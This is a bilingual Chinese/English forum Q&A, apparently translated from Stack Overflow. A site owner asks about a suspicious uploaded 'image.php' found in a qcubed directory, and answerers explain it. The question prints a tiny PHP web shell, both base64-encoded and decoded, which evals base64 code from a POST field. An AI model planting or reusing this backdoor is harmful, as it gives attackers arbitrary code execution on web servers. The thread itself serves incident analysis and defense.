base64 编码的 $_POST['e'] 变量上的 eval 实际上做了什么?
好吧,这就是我在 google 上搜索的内容:
似乎有一个名为“image.php”的上传文件上传到 qcubed 目录中。
该 image.php 文件包含以下 base64 代码:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
已解码它添加到此:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
搜索输出的字符串我在其他站点上发现了类似的 qcubed 漏洞。
解码我得到的最后一个回显字符串:
196.231-172.28:ifacermpubmice:afac42eri02
我真的不明白它的作用(使用:http:// ostermiller.org/calc/encode.html)。
您能解释一下我在这里面临的具体情况吗? 为了解决这个问题,我应该解决哪些安全漏洞?
Ok so here's what I've googled:
It seems there is an uploaded file named "image.php" that is uploaded in a qcubed directory.
That image.php file contains the following base64 code:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
decoded it adds to this:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
Searching for the outputed string I found simillar qcubed vulnerabilities on other sites.
Decoding the last echoed string I got:
196.231-172.28:ifacermpubmice:afac42eri02
Which I really don`t understand what it does (using:http://ostermiller.org/calc/encode.html).
Can you please explain me what in particular I`m facing here?
What security vulnerability I should adress in order to fix this?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
该脚本将执行从
e
POST 变量获取的任何 PHP 代码,这当然是一个可怕、最危险的漏洞。echo
语句可能是对攻击脚本的确认,即已安装正确的版本或其他内容。但是,只有当 image.php 文件实际上可以在该目录中执行时,这才是危险的。如果不知道文件最初是如何到达那里的,就很难给出该怎么做的建议。
The script will execute any PHP code it gets from the
e
POST variable, which of course is a horrible, most dangerous vulnerability.The
echo
statement might be a confirmation for the attacking script that the correct version is installed or something.However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.
脚本小子很可能使用漏洞利用闯入您的网站。确保您的 PHP 应用程序和库是最新的。
Most likely a script kiddie used an exploit to break into your site. Make sure your PHP application and libraries are up to date.